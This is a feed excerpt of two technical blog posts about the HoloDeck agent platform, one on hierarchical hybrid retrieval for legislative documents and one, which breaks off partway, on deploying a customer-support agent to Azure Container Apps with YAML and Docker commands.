&lt;p&gt;This blog post became the direct inspiration for a new tool I'm building in &lt;a href="https://github.com/justinbarias/holodeck" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt;, my open-source agent experimentation platform. I call it the &lt;strong&gt;Hierarchical Document Tool&lt;/strong&gt;, and it takes Anthropic's approach and pushes it further — specifically for the kind of deeply structured documents I deal with at work.&lt;/p&gt;

&lt;p&gt;The problem I'm solving is legislative analysis. We're talking about statutes, regulations, and policy documents that are 800 to 1,000 pages long, with intricate hierarchical structure: Titles, Chapters, Sections, Subsections, Paragraphs, Subparagraphs. A single piece of analysis might span multiple such documents. Getting retrieval wrong isn't just annoying — it means an agent cites the wrong section of law, or misses a critical cross-reference.&lt;/p&gt;

&lt;p&gt;Here's where the Hierarchical Document Tool goes beyond what Anthropic described:&lt;/p&gt;

&lt;h3&gt;
  
  
  Structure-aware chunking
&lt;/h3&gt;

&lt;p&gt;Instead of blindly splitting on token count, the tool parses markdown (converted from any source format) and chunks along structural boundaries. Every chunk retains its full parent chain as metadata:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;["Title I", "Chapter 2", "Section 203", "Subsection (a)", "Paragraph (1)"]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When a chunk is retrieved, you know &lt;em&gt;exactly&lt;/em&gt; where it lives in the document hierarchy. No more "this chunk mentions a 30-day deadline but I have no idea which part of which law it came from."&lt;/p&gt;
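&lt;p&gt;To make the idea concrete, here's an illustrative sketch (not HoloDeck's actual parser) of deriving that parent chain from markdown heading levels:&lt;/p&gt;

```python
# Illustrative sketch: walk markdown headings, tracking the chain of ancestor
# headings, and attach that chain to each leaf section's body text.

def heading_chains(markdown: str) -> list[tuple[list[str], str]]:
    """Return (parent_chain, text) pairs for each section that has body text."""
    chain: list[str] = []  # chain[i] = current heading at depth i + 1
    sections: list[tuple[list[str], list[str]]] = []
    for line in markdown.splitlines():
        if line.startswith("#"):
            level = len(line) - len(line.lstrip("#"))
            title = line.lstrip("#").strip()
            chain = chain[: level - 1] + [title]   # truncate deeper levels, push new heading
            sections.append((list(chain), []))
        elif sections and line.strip():
            sections[-1][1].append(line.strip())
    return [(c, " ".join(body)) for c, body in sections if body]

doc = """# Title I
## Chapter 2
### Section 203
The Administrator shall submit a report within 90 days.
"""
chunks = heading_chains(doc)
# chunks[0][0] == ["Title I", "Chapter 2", "Section 203"]
```

&lt;p&gt;The real tool chunks along these boundaries and stores the chain as metadata, but the principle is the same: the hierarchy travels with the chunk.&lt;/p&gt;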

&lt;h3&gt;
  
  
  Contextual embeddings via LLM
&lt;/h3&gt;

&lt;p&gt;Following Anthropic's approach, each chunk is sent through a lightweight LLM call (Claude Haiku or anything with a large enough context window) that generates a 50–100 token context preamble from the full document and the chunk's structural location. A chunk like &lt;em&gt;"The Administrator shall submit a report within 90 days"&lt;/em&gt; gets prepended with something like: &lt;em&gt;"This chunk is from Section 203 of the Environmental Protection Act, Title IV, Chapter 2, which covers administrative reporting requirements for regulated entities."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The contextualized text — preamble plus original chunk — is what gets embedded and indexed. The whole context generation pipeline for a 100-page document costs roughly &lt;strong&gt;$0.03&lt;/strong&gt; with prompt caching, runs 10 chunks concurrently, and falls back gracefully to raw chunks if the LLM call fails. Three cents. For a hundred pages. I'll take that trade every time.&lt;/p&gt;
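&lt;p&gt;The shape of that pipeline — bounded concurrency plus graceful fallback — looks roughly like this, with &lt;code&gt;llm_context&lt;/code&gt; standing in for the real model call:&lt;/p&gt;

```python
# Illustrative shape of the context-generation loop: a semaphore bounds the
# number of in-flight LLM calls, and any failure falls back to the raw chunk.
# llm_context stands in for the actual LLM call.
import asyncio

async def llm_context(chunk: str) -> str:
    return f"[context for: {chunk}]"  # placeholder for the actual LLM call

async def contextualize_all(chunks: list[str], concurrency: int = 10) -> list[str]:
    sem = asyncio.Semaphore(concurrency)

    async def one(chunk: str) -> str:
        async with sem:
            try:
                preamble = await llm_context(chunk)
                return f"{preamble}\n\n{chunk}"
            except Exception:
                return chunk  # graceful fallback: index the raw chunk as-is

    return list(await asyncio.gather(*(one(c) for c in chunks)))

result = asyncio.run(contextualize_all(["chunk one", "chunk two"]))
```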

&lt;h3&gt;
  
  
  Hybrid search with tiered keyword strategy
&lt;/h3&gt;

&lt;p&gt;This is where it gets fun. The tool maintains &lt;strong&gt;three&lt;/strong&gt; parallel indices: dense (embedding) for semantic search, sparse (BM25) for keyword search, and exact match for precise lookups like section numbers (the exact-match index is still to be built).&lt;/p&gt;

&lt;p&gt;What makes this interesting is the keyword search layer. Not every vector store supports native hybrid search, so the tool uses a tiered strategy:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Tier 1 — Native hybrid&lt;/strong&gt;: If your provider supports it (Azure AI Search, Weaviate, Qdrant), use the built-in hybrid capabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 2 — OpenSearch&lt;/strong&gt;: Route to an OpenSearch endpoint for production-grade BM25&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tier 3 — In-memory BM25&lt;/strong&gt;: Fall back to an in-memory index for development and testing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;All three search modalities run in parallel and merge via Reciprocal Rank Fusion (&lt;code&gt;score(d) = sum of weight_i / (k + rank_i)&lt;/code&gt;, with k=60 by default) with configurable weights.&lt;/p&gt;

&lt;p&gt;And because RRF is rank-based, it doesn't require score normalization across different search engines. The best BM25 result gets a big boost even if its raw score is on a different scale than the embedding similarity. This means you can tune the weights to favor precision (keyword) or recall (semantic) without worrying about score calibration.&lt;/p&gt;

&lt;p&gt;When someone searches for "Section 403(b)(2)", the exact match index catches it instantly. When they search for "What are the environmental reporting requirements?", the semantic index handles it. In practice, most queries benefit from all three.&lt;/p&gt;

&lt;h3&gt;
  
  
  Reranking: the final 18% that matters
&lt;/h3&gt;

&lt;p&gt;Look at Anthropic's numbers again. Contextual embeddings + BM25 gets you from 5.7% to 2.9% — a 49% reduction. But adding a reranker on top pushes that to 1.9% — lifting the total reduction from 49% to 67%. That last mile matters a &lt;em&gt;lot&lt;/em&gt; when you're working with legal text where "close enough" isn't.&lt;/p&gt;

&lt;p&gt;Here's what reranking actually does: after RRF merges your vector and keyword results into a single ranked list, you take the top N candidates (say, 30) and pass them through a cross-encoder model that scores each candidate &lt;em&gt;in the context of the original query&lt;/em&gt;. Unlike embedding similarity — which compares pre-computed vectors — a cross-encoder sees the query and the document chunk together, which lets it catch nuances that embedding distance misses.&lt;/p&gt;

&lt;p&gt;The trade-off is latency. Cross-encoders are slower because they can't pre-compute anything — every query-document pair needs a forward pass. But we're talking about scoring 20–30 candidates, not your entire corpus. In practice, that's under 500ms, which is plenty fast for most use cases.&lt;/p&gt;
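&lt;p&gt;Structurally, the rerank stage is simple: score only the head of the fused list against the query, then reorder. The &lt;code&gt;cross_encoder_score&lt;/code&gt; below is a trivial token-overlap stub standing in for a real cross-encoder (or a Cohere-compatible rerank call), just so the sketch runs:&lt;/p&gt;

```python
# Shape of the rerank stage: score only the top-N candidates, then reorder.
# cross_encoder_score is a token-overlap stub standing in for a real
# cross-encoder model; a production system would call one forward pass per
# query-document pair instead.

def cross_encoder_score(query: str, chunk: str) -> float:
    """Stub scorer: fraction of query tokens present in the chunk."""
    q = set(query.lower().split())
    c = set(chunk.lower().split())
    return len(q & c) / len(q)

def rerank(query: str, candidates: list[str], top_n: int = 30, top_k: int = 10) -> list[str]:
    pool = candidates[:top_n]  # only score the head of the fused list
    pool.sort(key=lambda ch: cross_encoder_score(query, ch), reverse=True)
    return pool[:top_k]

hits = ["unrelated boilerplate text",
        "reporting requirements for regulated entities",
        "definitions of key terms"]
best = rerank("reporting requirements", hits, top_n=3, top_k=1)
# best == ["reporting requirements for regulated entities"]
```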

&lt;p&gt;Reranking isn't in HoloDeck yet — it's next on the roadmap. But I've already designed it as an opt-in extension for vectorstore tools, and the plan supports two providers:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Cohere Rerank API&lt;/strong&gt; — cloud-hosted, fast, no infrastructure to manage. Great for getting started&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;vLLM&lt;/strong&gt; — self-hosted reranking models for teams with data privacy requirements or who want to run open-source cross-encoders. vLLM exposes a Cohere-compatible &lt;code&gt;/v1/rerank&lt;/code&gt; endpoint, so the same client code works for both&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The config will be dead simple. Add &lt;code&gt;rerank: true&lt;/code&gt; to any vectorstore tool and you're done:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tools:
  - name: knowledge_search
    type: vectorstore
    config:
      index: product-docs
    rerank: true
    reranker:
      provider: cohere
      model: rerank-english-v3.0
      api_key: ${COHERE_API_KEY}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few things I'm particularly happy with in the design so far:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Candidate pool sizing&lt;/strong&gt;: By default, the reranker gets &lt;code&gt;top_k * 3&lt;/code&gt; candidates. If you're returning 10 results, the system fetches 30 from the initial search, reranks all 30, then returns the top 10. More candidates = better reranking quality, at the cost of slightly more latency. You can tune &lt;code&gt;rerank_top_n&lt;/code&gt; directly if you want to dial this in&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Graceful fallback&lt;/strong&gt;: If the reranker fails (network timeout, rate limit, service down), the system silently falls back to the original ranked results and logs a warning. Your search doesn't break just because the reranker had a bad day. Configuration errors like bad API keys still fail fast though — you want to know about those immediately, not discover them at 2am&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Zero breaking changes&lt;/strong&gt;: Existing vectorstore configs without &lt;code&gt;rerank: true&lt;/code&gt; work exactly as before. The whole thing is opt-in&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Definition and cross-reference extraction
&lt;/h3&gt;

&lt;p&gt;Legal and regulatory documents are &lt;em&gt;riddled&lt;/em&gt; with defined terms ("&lt;em&gt;Administrator&lt;/em&gt; means the Administrator of the Environmental Protection Agency") and cross-references ("as described in Section 201(a)(1)(b)"). If you've ever tried to read legislation, you know the pain — half the document is just pointing at other parts of the document.&lt;/p&gt;

&lt;p&gt;The tool detects definitions sections and extracts them into a separate, always-available reference. Cross-references are identified and stored so agents can navigate related sections.&lt;/p&gt;
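&lt;p&gt;Cross-reference detection can start from something as humble as a regex — this is an illustration, not the tool's actual extractor:&lt;/p&gt;

```python
# One way to surface cross-references (illustrative, not the tool's parser):
# a regex for "Section 201(a)(1)(b)"-style citations.
import re

SECTION_REF = re.compile(r"Section\s+\d+[A-Za-z]?(?:\([0-9a-zA-Z]+\))*")

text = ("as described in Section 201(a)(1)(b), and subject to the limits "
        "in Section 403(b)(2)")
refs = SECTION_REF.findall(text)
# refs == ["Section 201(a)(1)(b)", "Section 403(b)(2)"]
```

&lt;p&gt;Stored alongside each chunk, matches like these give an agent the hooks it needs to jump to the referenced section instead of guessing.&lt;/p&gt;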

&lt;p&gt;This is still evolving — planned improvements include explicit tools that let agents look up term definitions on demand and resolve section cross-references directly (more on this in the agentic shift section below).&lt;/p&gt;

&lt;h3&gt;
  
  
  The YAML
&lt;/h3&gt;

&lt;p&gt;And because HoloDeck is a no-code agent platform, all of this is configured through YAML:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tools:
  - name: legislative_search
    type: hierarchical_document
    source: ./regulations
    contextual_embeddings: true
    context_model:
      provider: azure_openai
      name: gpt-5-mini # use a cheap, fast model but with a large context window
      temperature: 0.0
    context_max_tokens: 100
    context_concurrency: 10
    chunking_strategy: structure
    max_chunk_tokens: 800
    semantic_weight: 0.5
    keyword_weight: 0.3
    exact_weight: 0.2
    # rerank: true # coming soon
    # reranker:
    #   provider: cohere
    #   model: rerank-english-v3.0

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One YAML block. Structure-aware chunking, contextual embeddings with a cheap LLM, triple-index hybrid search — and reranking once that lands. No Python required. I'm pretty happy with how this turned out.&lt;/p&gt;

&lt;h2&gt;
  
  
  Don't Forget Structured Data
&lt;/h2&gt;

&lt;p&gt;While we're on the topic of retrieval, there's another blind spot in the "RAG everything" approach that nobody talks about: &lt;strong&gt;structured data&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Most enterprise RAG discussions focus exclusively on unstructured content — PDFs, Word docs, policy manuals. But organisations sit on mountains of structured data in CSVs, JSON feeds, databases, and APIs. An agent doing legislative analysis might need to cross-reference a regulation with a structured dataset of enforcement actions, compliance filings, or budget allocations.&lt;/p&gt;

&lt;p&gt;Any serious RAG strategy needs to account for both:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Unstructured content&lt;/strong&gt; → chunking-embedding-retrieval pipeline&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Structured data&lt;/strong&gt; → query interfaces (SQL, API calls, structured search)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Treating everything as "documents to embed" is how you end up with a chatbot that can vaguely summarise a spreadsheet but can't tell you the exact value in row 47. Don't be that team.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Agentic Shift
&lt;/h2&gt;

&lt;p&gt;Meanwhile, the landscape is shifting under our feet. Tools like Claude Code, OpenAI Codex, and others are introducing sophisticated agentic workflows where the AI doesn't just retrieve — it &lt;em&gt;reasons about what to retrieve, how to retrieve it, and what to do with the results&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;I wrote about this in a previous post, &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;Agentic Memory: Bash + File System Is All You Need&lt;/a&gt;, exploring how advanced memory management for agents can be as simple as reading and writing files. The same principle applies to retrieval: the most effective systems aren't the ones with the most exotic retrieval algorithm. They're the ones where the agent has the right tools — look up a definition, navigate to a section, search by keyword, search by concept — and the judgment to use them appropriately.&lt;/p&gt;

&lt;p&gt;This is why I'm building the Hierarchical Document Tool as a &lt;em&gt;toolkit&lt;/em&gt;, not a monolithic search endpoint. Today the tool exposes hybrid search with structure-aware results. But the roadmap includes giving agents explicit primitives:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A &lt;strong&gt;definition lookup tool&lt;/strong&gt; so the agent can resolve defined terms on demand ("What does 'Administrator' mean in this Act?")&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;section navigation tool&lt;/strong&gt; that lets agents traverse the document hierarchy directly ("Go to Title 1, Chapter 3, Section 201(a)(1)(b)")&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Instead of one big search call, the agent gets the building blocks to reason about information retrieval the way a human researcher would — look up a term, follow a cross-reference, search semantically, then search by keyword to confirm. That's the real unlock.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem That Was Never Solved
&lt;/h2&gt;

&lt;p&gt;Here's what I keep coming back to: &lt;strong&gt;information retrieval is a decades-old problem, and we haven't solved it.&lt;/strong&gt; We've just been cycling through new implementations of the same fundamental challenge.&lt;/p&gt;

&lt;p&gt;Before LLMs, we had TF-IDF, BM25, latent semantic analysis, learning-to-rank. These techniques powered search engines that actually worked, that billions of people relied on daily. Then the LLM wave hit, and somehow the industry collectively decided to replace all of that hard-won information retrieval knowledge with "just embed everything and do cosine similarity."&lt;/p&gt;

&lt;p&gt;That was never going to be enough. Embeddings are powerful for capturing semantic similarity, but they're terrible at exact matching, structured lookups, and preserving document hierarchy. BM25 is excellent at keyword precision but misses conceptual relationships. The answer — as Anthropic demonstrated with the hybrid pipeline above — is to combine them thoughtfully. And to respect the structure of the documents you're working with.&lt;/p&gt;

&lt;p&gt;The organisations I see struggling with RAG aren't struggling because the technology is bad. They're struggling because they skipped the boring parts: understanding their document structures, building proper indexing pipelines, implementing hybrid search, testing retrieval quality independently from generation quality. They jumped straight to the chatbot demo and wondered why it hallucinated.&lt;/p&gt;

&lt;h2&gt;
  
  
  RAG Isn't Dead. We Just Never Did It Right.
&lt;/h2&gt;

&lt;p&gt;The hype cycle wants to move on. Context windows are growing. Some argue we'll eventually just stuff everything into the prompt. Maybe. But for the foreseeable future — for the 800-page statutes, the multi-document regulatory analyses, the enterprise knowledge bases with tens of thousands of documents — retrieval is still the bottleneck, and getting it right still matters enormously.&lt;/p&gt;

&lt;p&gt;Anthropic's contextual retrieval technique isn't magic. It's just good engineering: understand what information is lost in your pipeline, and put it back. Combine vector and keyword search with RRF instead of betting everything on embeddings. Add a reranker if you can. The Hierarchical Document Tool I'm building takes that same philosophy and extends it to deeply structured documents where &lt;em&gt;position in the hierarchy is meaning itself&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;RAG had promise. It still does. But it's time we stopped treating information retrieval as a solved problem that just needs a vector database, and started treating it as the hard, nuanced, domain-specific engineering challenge it's always been.&lt;/p&gt;

&lt;p&gt;The shiny new thing will always be tempting. But sometimes the biggest gains come from going back and doing the old thing properly.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post is part of a series on building AI agent tooling. Read my previous post on &lt;a href="https://justinbarias.io/blog/agentic-memory-filesystem-part-1/" rel="noopener noreferrer"&gt;Agentic Memory: Bash + File System Is All You Need&lt;/a&gt; for more on the patterns I'm implementing in HoloDeck.&lt;/em&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Wed, 28 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/from-yaml-to-production-deploying-holodeck-agents-to-azure-container-apps-2a1e</link>
      <guid>https://dev.to/jeremiahbarias/from-yaml-to-production-deploying-holodeck-agents-to-azure-container-apps-2a1e</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwysk3kpln2iedwz6j1s3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwysk3kpln2iedwz6j1s3.png" alt=" " width="800" height="281"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h1&gt;
  
  
  From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps
&lt;/h1&gt;

&lt;p&gt;Your agent works locally. The evaluations pass. Chat sessions flow smoothly. Now comes the question every agent developer faces: how do I get this thing into production?&lt;/p&gt;

&lt;p&gt;Traditionally, this is where the real work begins—Dockerfiles, container registries, Kubernetes manifests, ingress controllers, health checks. But with HoloDeck's new &lt;code&gt;deploy&lt;/code&gt; command, you can go from a local YAML configuration to a production endpoint in a few commands. No Kubernetes required.&lt;/p&gt;

&lt;p&gt;In this guide, we'll walk through deploying a customer support agent to Azure Container Apps.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Customer Support Agent
&lt;/h2&gt;

&lt;p&gt;Let's start with what we're deploying. The &lt;code&gt;customer-support&lt;/code&gt; agent in &lt;code&gt;sample/customer-support/ollama/&lt;/code&gt; (from &lt;a href="https://github.com/justinbarias/holodeck-samples" rel="noopener noreferrer"&gt;github.com/justinbarias/holodeck-samples&lt;/a&gt;) is a context-aware support chatbot with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Knowledge base search&lt;/strong&gt; via vector stores for product documentation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FAQ lookup&lt;/strong&gt; for quick answers to common questions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Product catalog search&lt;/strong&gt; for subscription plans and pricing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Conversation memory&lt;/strong&gt; via MCP for context persistence&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's the core configuration:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: customer-support
description: Context-aware customer support agent with knowledge base integration

model:
  provider: ollama
  name: gpt-oss:20b
  temperature: 0.3
  max_tokens: 4096
  endpoint: http://truenas.home:11434

instructions:
  file: instructions/system-prompt.md

tools:
  # Knowledge Base - Product documentation and support articles
  - name: knowledge_base
    type: vectorstore
    description: Search product documentation and support articles
    database: chromadb
    embedding_model: nomic-embed-text:latest
    top_k: 5
    source: data/knowledge_base.md

  # FAQ Database - Frequently asked questions
  - name: faq
    type: vectorstore
    description: Search frequently asked questions for quick answers
    database: chromadb
    embedding_model: nomic-embed-text:latest
    source: data/faq.json
    top_k: 3

  # Memory - Conversation persistence via MCP
  - name: memory
    type: mcp
    description: Store and retrieve conversation context
    command: npx
    args:
      - "-y"
      - "@modelcontextprotocol/server-memory"

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No Python code. Just YAML. The agent knows how to search documentation, look up FAQs, and remember conversation context—all defined declaratively.&lt;/p&gt;

&lt;h2&gt;
  
  
  Adding Deployment Configuration
&lt;/h2&gt;

&lt;p&gt;To deploy this agent, we add a &lt;code&gt;deployment&lt;/code&gt; section to &lt;code&gt;agent.yaml&lt;/code&gt;. This tells HoloDeck where to push the container image and which cloud provider to use:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;deployment:
  registry:
    url: ghcr.io
    repository: justinbarias/customer-support-agent
  target:
    provider: azure
    azure:
      subscription_id: &amp;lt;guid-of-subscription-id&amp;gt;
      resource_group: holodeck-aca
      environment_name: holodeck-env
      location: australiaeast
  protocol: rest
  port: 8080

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's break this down:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Field&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;registry.url&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Container registry (GitHub Container Registry in this case)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;registry.repository&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Repository name for the image&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;target.provider&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cloud provider (&lt;code&gt;azure&lt;/code&gt;, &lt;code&gt;aws&lt;/code&gt;, or &lt;code&gt;gcp&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;target.azure.*&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Azure-specific settings—subscription, resource group, environment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;protocol&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;API protocol (&lt;code&gt;rest&lt;/code&gt; or &lt;code&gt;ag-ui&lt;/code&gt; for CopilotKit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;port&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Port the agent listens on&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Building the Container Image
&lt;/h2&gt;

&lt;p&gt;With the deployment configuration in place, building the image is a single command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy build agent.yaml

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Here's what happens:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Loading agent configuration from agent.yaml...

Build Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Platform: linux/amd64
  Protocol: rest
  Port: 8080

Preparing build context...
Connecting to Docker...
Building image ghcr.io/justinbarias/customer-support-agent:3443eda...

============================================================
  Build Successful!
============================================================

  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  ID: sha256:b7e145183148...

  Next steps:
    Run locally: docker run -p 8080:8080 ghcr.io/justinbarias/customer-support-agent:3443eda
    Push to registry: docker push ghcr.io/justinbarias/customer-support-agent:3443eda

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Behind the scenes, HoloDeck:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Generates a Dockerfile&lt;/strong&gt; using the &lt;code&gt;holodeck-base&lt;/code&gt; image&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Copies your agent files&lt;/strong&gt; (agent.yaml, instructions, data directories)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Creates an entrypoint script&lt;/strong&gt; that runs &lt;code&gt;holodeck serve&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Builds the image&lt;/strong&gt; with OCI-compliant labels&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tags it&lt;/strong&gt; with the current git SHA (&lt;code&gt;3443eda&lt;/code&gt;)&lt;/li&gt;
&lt;/ol&gt;
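&lt;p&gt;Step 5 follows the same convention you'd get from &lt;code&gt;git rev-parse&lt;/code&gt;. A hypothetical helper (a sketch of the idea, not HoloDeck's actual code) that reproduces the image reference seen in the build output:&lt;/p&gt;

```python
# Hypothetical sketch (not HoloDeck's implementation) of deriving an image
# reference like ghcr.io/justinbarias/customer-support-agent:3443eda.
import subprocess

def current_git_tag(default="latest"):
    """Short SHA of HEAD, falling back when git or a repo is unavailable."""
    try:
        out = subprocess.run(
            ["git", "rev-parse", "--short", "HEAD"],
            capture_output=True, text=True, check=True,
        )
        return out.stdout.strip()
    except (OSError, subprocess.CalledProcessError):
        return default

def image_ref(registry, repository, tag):
    # Combines registry.url, registry.repository, and the tag from agent.yaml.
    return f"{registry}/{repository}:{tag}"

print(image_ref("ghcr.io", "justinbarias/customer-support-agent", current_git_tag()))
```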

&lt;p&gt;Want to see what would be built without actually building? Use &lt;code&gt;--dry-run&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy build agent.yaml --dry-run

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This shows the generated Dockerfile and build context without executing anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  Pushing to Registry
&lt;/h2&gt;

&lt;p&gt;The &lt;code&gt;holodeck deploy push&lt;/code&gt; command is planned but not yet implemented. For now, use Docker directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Login to GitHub Container Registry
docker login ghcr.io -u USERNAME

# Push the image
docker push ghcr.io/justinbarias/customer-support-agent:3443eda


The push refers to repository [ghcr.io/justinbarias/customer-support-agent]
c57f153dc3b1: Pushed
cab5b36daf6a: Pushed
0190bcbc478d: Pushed
...
3443eda: digest: sha256:d807e905fed0... size: 4080

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Deploying to Azure Container Apps
&lt;/h2&gt;

&lt;p&gt;With the image in the registry, deployment is another single command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck deploy run agent.yaml


Deploy Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Tag: 3443eda
  Platform: linux/amd64
  Provider: azure
  Port: 8080

Deployment Successful!
  Service: customer-support
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Health: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;HoloDeck creates an Azure Container App with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;External ingress&lt;/strong&gt; with automatic HTTPS&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Health checks&lt;/strong&gt; on &lt;code&gt;/health&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto-scaling&lt;/strong&gt; based on HTTP traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Environment variables&lt;/strong&gt; for LLM API keys (passed through securely)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The agent is now live at the generated URL.&lt;/p&gt;

&lt;h2&gt;
  
  
  Testing the Deployed Agent
&lt;/h2&gt;

&lt;p&gt;Let's verify the deployment with a health check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
